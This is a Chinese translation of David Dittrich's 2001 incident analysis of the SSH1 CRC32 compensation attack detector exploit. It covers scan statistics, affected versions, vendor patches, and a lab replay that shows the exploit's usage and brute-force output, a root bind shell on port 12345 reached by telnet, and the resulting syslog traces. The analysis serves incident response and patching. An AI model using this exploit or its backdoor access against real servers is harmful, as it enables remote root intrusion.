明輝手游網(wǎng)中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

對于SSH crc32 compensation attack detector exploit 的區(qū)分

發(fā)表時間:2024-05-23 來源:明輝站整理相關軟件相關文章人氣:

[摘要]由于SSH crc32 compensation attack detector exploit代碼的流傳開來,對于 SSH的掃描也越來越多,這是一份統(tǒng)計報表: +------------+------------+----------+----------+-----------+ date...

由于SSH crc32 compensation attack detector exploit代碼的流傳開來,對于
SSH的掃描也越來越多,這是一份統(tǒng)計報表:

+------------+------------+----------+----------+-----------+
date #Probes #Sources #Targets #Scanners
+------------+------------+----------+----------+-----------+
2001-10-03  1466 45 987 
2001-10-04 319 25 212 
2001-10-05 825 22 783 
2001-10-06 86552 27 86305  
2001-10-07  7564 29  7429 
2001-10-08  2506 29  2449 
2001-10-09  1010 18 263 
2001-10-10 480 39 307 
2001-10-11 978 31 504 
2001-10-12 436 21 311 
2001-10-13  6731 27  6353 
2001-10-14  1411 29  1084 
2001-10-15 936 34 723 
2001-10-16  1358 40  1256 
2001-10-17  1098 36 899 
2001-10-18  1779 31  1438 
2001-10-19 19722 28 19573  7
2001-10-20 25539 21 25419  3
2001-10-21  6796 26  6750  9
2001-10-22 807 30 482  5
2001-10-23 578 49 327  6
2001-10-24  2198 39  2025  9
2001-10-25  2368 31  1759  6
2001-10-26 712 37 591  7
2001-10-27 463 30 297  8
2001-10-28 495 30 263  5
2001-10-29 478 37 399  5
2001-10-30  1154 48  1051  5
2001-10-31  1998 46  1047  5
2001-11-01 66660 46 66386  5
2001-11-02  1514 40 926  5
2001-11-03  2142 36  2047  8
2001-11-04  1233 26 781  9
+------------+------------+----------+----------+-----------+

鑒于此情況,編譯整理David A. Dittrich <dittrich@cac.washington.edu> 文章(http://staff.washington.edu/dittrich/misc/ssh-analysis.txt)供大家參考和修補。

-------------------------------------------------------------------------------

概述
==================

此漏洞最開始由CORE-SDI組織在securityfocus.com上的BUGTRAQ上發(fā)布了他們安全
公告CORE-20010207,日期為2001,2月8號:

http://www.securityfocus.com/advisories/3088

漏洞的簡單描述就是:ssh1守護程序中所帶的一段代碼中存在一個整數(shù)溢出問題。問題出在
deattack.c,此程序由CORE SDI開發(fā),用來防止SSH1協(xié)議受到CRC32補償攻擊。

由于在detect_attack()函數(shù)中錯誤的將一個16位的無符號變量當成了32位變量來使用,導致表索引溢出問題。

這將允許一個攻擊者覆蓋內(nèi)存中的任意位置的內(nèi)容,攻擊者可能遠程獲取root權(quán)限。

其他組織也陸續(xù)公布了一些對這個SSH 漏洞的分析和建議如:

  http://xforce.iss.net/alerts/advise100.php
  http://razor.bindview.com/publish/advisories/adv_ssh1crc.html
  http://www.securityfocus.com/bugid=2347

而在2001年10月21號Jay Dyson在incidents@securityfocus.com郵件列表上聲明
有不少信息顯示有人在掃描RIPE 網(wǎng)絡段的SSH服務器:

  http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1

然后更甚的是在vuln-dev@securityfocus.com郵件列表中提示Newsbytes.com中
有新聞描述有人愿付$1000美金的人提供此攻擊工具。還有沒有確認的傳聞針對
Solaris 8/SPARC SSH.com 1.2.26-31 系統(tǒng)的攻擊代碼也存在。著名的安全站點
securitynewsportal.com就被這個漏洞攻擊,下面地址是被黑截圖:

  http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/

最近TESO發(fā)布了關于這些攻擊代碼的信息,你可以在下面的地址查看:

  http://www.team-teso.org/sshd_statement.php


下面是受影響的SSH版本:

SSH Communications Security SSH 2.x and 3.x (if SSH Version 1 fallback is enabled)
SSH Communications Security SSH 1.2.23-1.2.31
F-Secure SSH versions prior to 1.3.11-2
OpenSSH versions prior to 2.3.0 (if SSH Version 1 fallback is enabled)
OSSH 1.5.7

不過供應商已經(jīng)為系統(tǒng)提供補丁信息,大家可以參考如下地址:

  http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
  http://openssh.org/security.html
  http://www.cisco.com/warp/public/707/SSH-multiple-pub.html


---------------------------------------------------------------------------

攻擊行為的分析
=====================

2001年10月6日,攻擊者從Netherlands網(wǎng)絡段使用crc32 compensation attack
detector漏洞攻擊程序入侵了一臺UW網(wǎng)絡中使用了OpenSSH 2.1.1的Redhat linux
系統(tǒng),漏洞描述如CERT VU#945216所述:

  http://www.kb.cert.org/vuls/id/945216

系統(tǒng)中一系列操作系統(tǒng)命令被替換成木馬程序以提供以后再次進入并清除了所有
日志系統(tǒng)。第二臺SSH服務器運行在39999/tcp高端口,系統(tǒng)入侵后被用來掃描其他
UW以外的網(wǎng)絡以獲得更多的運行OpenSSH 2.1.1的系統(tǒng)。

通過一些恢復操作對這個漏洞程序進行了分析:

這個攻擊代碼基于OpenSSH 2.2.0版本(這個是2.1.1之后的版本,對crc32
compensation attack detection function進行了修補),不過針對OpenSSH
2.1.1進行攻擊,其攻擊代碼也可以使用在ssh.com 1.2.31版本(針對其他SSH
協(xié)議1 和版本的測試尚無完成)。

攻擊代碼對針對如下系統(tǒng):

  linux/x86 ssh.com 1.2.26-1.2.31 rhl
  linux/x86 openssh 1.2.3 (maybe others)
  linux/x86 openssh 2.2.0p1 (maybe others)
  freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl

雖然這個攻擊代碼可以對多個平臺系統(tǒng)進行攻擊,這里攻擊者只掃描22/tcp端口,
然后連接這些系統(tǒng)獲得響應的版本程序并只對"OpenSSH_2.1.1"繼續(xù)進一步操作。
這些掃描使用快速SYN掃描,使用來自t0rn root kit中的工具。

對破壞的系統(tǒng)進行分析發(fā)現(xiàn)已經(jīng)有47067個地址被掃描,而在這些地址中,有1244
個主機被鑒別存在此漏洞,攻擊者成功的在8月8日系統(tǒng)離線之前利用此漏洞進入
4個主機。

這個攻擊者代碼對使用訪問控制限制(如, SSH.com的"AllowHosts" 或者 "DenyHosts"
設置) 或者包過濾(如, ipchains, iptables, ipf) 的系統(tǒng)不能正常工作,因為這些
會要求交換Public keys。

-------------------------------------------------------------------------

對攻擊者代碼實時的分析
============================

此攻擊代碼在隔離的網(wǎng)絡段進行測試,使用了網(wǎng)絡地址為10.10.10.0/24,攻擊
主機使用了10.10.10.10 而有漏洞的服務主機為 10.10.10.3。

有漏洞的服務主機系統(tǒng)運行了在Red Hat Linux6.0(Kernel 2.2.16-3 on an i586)
的SSH.com的 1.2.31 版本。

而攻擊主機運行了Fred Cohen's PLAC[1] (從CD-ROM引導的Linux 2.4.5 系統(tǒng)),
文件使用"nc"(Netcat)[2]拷貝到系統(tǒng)中.

攻擊一方再現(xiàn)
=========================

當以沒有任何參數(shù)運行攻擊代碼的時候會顯示使用信息:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh



linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src


greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/


**please pick a type**


Usage: ./ssh host [options]
Options:
  -p port
  -b base Base address to start bruteforcing distance, by default 0x1800,
goes as high as 0x10000
  -t type
  -d debug mode
  -o Add this to delta_min


types:


0: linux/x86 ssh.com 1.2.26-1.2.31 rhl
1: linux/x86 openssh 1.2.3 (maybe others)
2: linux/x86 openssh 2.2.0p1 (maybe others)
3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

被測試系統(tǒng)在系統(tǒng)端口2222上運行著SSH.com version 1.2.31 (未修補)程序,并
把syslog日志重定向獨立的文件sshdx.log.

這里選擇了類型type 0和2222 攻擊端口:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0



linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from
openssh 2.2.0 src


greets: mray, random, big t, sh1fty, scut, dvorak
ps. this sploit already owned cia.gov :/


...........................
bruteforced distance: 0x3200
bruteforcing distance from h->partial packet buffer on stack
..............^[[A................ ////////\\\\!
bruteforced h->ident buff distance: 5bfbed88


trying retloc_delta: 35
....!
found high words of possible return address: 808
trying to exploit
....
trying retloc_delta: 37
.!
found high words of possible return address: 805
trying to exploit
....
trying retloc_delta: 39
......
trying retloc_delta: 3b
......
trying retloc_delta: 3d
!
found high words of possible return address: 804
trying to exploit
....
trying retloc_delta: 3f
......
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

這里看來,攻擊攻擊相似被"停止"了,返回被攻擊系統(tǒng)查看卻發(fā)現(xiàn)被開了后門。

被測試系統(tǒng)一方再現(xiàn)
=======================

在利用漏洞之前,被測試系統(tǒng)顯示標準SSH守護程序運行在22/tcp端口,要被
測試的應用程序運行在2222/tcp端口,兩個都在監(jiān)聽狀態(tài),而且標準SSH守護
程序有一個外部連接(10.10.10.2:33354),通過netstat查看如下:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

而在攻擊程序"停止"以后,再用netstat查看網(wǎng)絡監(jiān)聽狀態(tài)如下:




=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:2222 10.10.10.10:32965 ESTABLISHED
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

發(fā)現(xiàn)有新的服務在12345/tcp端口監(jiān)聽。

返回攻擊者主機,使用netstat查看網(wǎng)絡狀態(tài),發(fā)現(xiàn)程序使用了暴力猜測地址
方式攻擊:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED
tcp 0 0 10.10.10.3:2222 10.10.10.10:33075 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33074 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33072 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33071 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33069 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33067 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33066 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33064 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33063 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33062 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33061 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33060 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33059 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33058 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33056 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33055 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33053 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33051 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33050 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33048 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33047 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33046 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33042 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33041 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33040 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33039 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33038 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33036 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33035 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33034 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33033 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33032 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33030 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33029 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33028 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33027 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33024 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33023 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33022 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33021 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33020 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33016 TIME_WAIT
tcp 0 0 10.10.10.3:2222 10.10.10.10:33014 TIME_WAIT
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

而使用LiSt Open Files ("lsof")[4]工具顯示被測試的SSH守護程序開啟了一個
新的監(jiān)聽端口:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# lsof -p 9364
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 9364 root cwd DIR 3,3 1024 2 /
sshd 9364 root rtd DIR 3,3 1024 2 /
sshd 9364 root txt REG 3,3 655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1
sshd 9364 root mem REG 3,3 340771 30722 /lib/ld-2.1.3.so
sshd 9364 root mem REG 3,3 370141 31107 /lib/libnsl-2.1.3.so
sshd 9364 root mem REG 3,3 66231 31103 /lib/libcrypt-2.1.3.so
sshd 9364 root mem REG 3,3 47008 31113 /lib/libutil-2.1.3.so
sshd 9364 root mem REG 3,3 4101836 31102 /lib/libc-2.1.3.so
sshd 9364 root mem REG 3,3 246652 31109 /lib/libnss_files-2.1.3.so
sshd 9364 root mem REG 3,3 252234 31111 /lib/libnss_nisplus-2.1.3.so
sshd 9364 root mem REG 3,3 255963 31110 /lib/libnss_nis-2.1.3.so
sshd 9364 root mem REG 3,3 67580 31108 /lib/libnss_dns-2.1.3.so
sshd 9364 root mem REG 3,3 169720 31112 /lib/libresolv-2.1.3.so
sshd 9364 root 0u CHR 1,3 4110 /dev/null
sshd 9364 root 1u CHR 1,3 4110 /dev/null
sshd 9364 root 2u CHR 1,3 4110 /dev/null
sshd 9364 root 3u inet 10202 TCP *:12345 (LISTEN)
sshd 9364 root 4u inet 10197 TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

很明顯,攻擊程序成功利用此漏洞獲得ROOT SHELL,并綁定了一個高端TCP端口。
這樣攻擊者可以使用任何"telnet"或者"rc"工具連接到此端口并以超級用戶的
方式執(zhí)行任意命令,如下所示:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
root@plac ~ >> telnet 10.10.10.3 12345
Trying 10.10.10.3...
Connected to 10.10.10.3.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
date;
Thu Nov 1 18:04:42 PST 2001
netstat -an --inet;
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:12345 10.10.10.10:33077 ESTABLISHED
tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN
tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
exit;
Connection closed by foreign host.
root@plac ~ >>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[注意]:使用telnet要加";"號,而nc連接不需要。

等攻擊者退出以后,被測試系統(tǒng)網(wǎng)絡狀態(tài)返回正常:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[root@victim /root]# netstat -an --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
raw 0 0 0.0.0.0:1 0.0.0.0:* 7
raw 0 0 0.0.0.0:6 0.0.0.0:* 7
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

如果syslog日志功能開啟了,連接和暴力測試的信息全部會記錄下來(注意,這個是
對SSH.com 1.2.31在Red Hat LInux 6.0上的測試 -- 日志標志會和記錄OpenSSH
不一樣):

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Nov 1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298
Nov 1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299
Nov 1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300
Nov 1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301
Nov 1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302
Nov 1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303
Nov 1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304
Nov 1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305
Nov 1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306
Nov 1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host.
Nov 1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307
Nov 1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308
Nov 1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309
Nov 1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310
Nov 1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311
Nov 1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312
Nov 1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313
Nov 1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314
Nov 1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host.
Nov 1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315
Nov 1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316
Nov 1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317
Nov 1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318
Nov 1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319
Nov 1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320
Nov 1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321
Nov 1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322
Nov 1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323
Nov 1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324
Nov 1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325
Nov 1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326
Nov 1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327
Nov 1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328
Nov 1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329
Nov 1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330
Nov 1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331
Nov 1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332
Nov 1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333
Nov 1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334
Nov 1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335
Nov 1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336
Nov 1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337
Nov 1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338
Nov 1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339
Nov 1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340
Nov 1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341
Nov 1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342
Nov 1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343
Nov 1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344
Nov 1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345
Nov 1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346
Nov 1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347
Nov 1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348
Nov 1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349
Nov 1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350
Nov 1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351
Nov 1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352
Nov 1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353
Nov 1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354
Nov 1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355
Nov 1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356
Nov 1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357
Nov 1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358
Nov 1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359
Nov 1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360
Nov 1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361
Nov 1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362
Nov 1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363
Nov 1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364
Nov 1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365
Nov 1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366
Nov 1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367
Nov 1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368
Nov 1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369
Nov 1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370
Nov 1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371
Nov 1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372
Nov 1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373
Nov 1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374
Nov 1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375
Nov 1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376
Nov 1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377
Nov 1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378
Nov 1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379
Nov 1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380
Nov 1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381
Nov 1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382
Nov 1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383
Nov 1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384
Nov 1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385
Nov 1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386
Nov 1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387
Nov 1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388
Nov 1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389
Nov 1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390
Nov 1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391
Nov 1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392
Nov 1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393
Nov 1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394
Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395
Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396
Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397
Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398
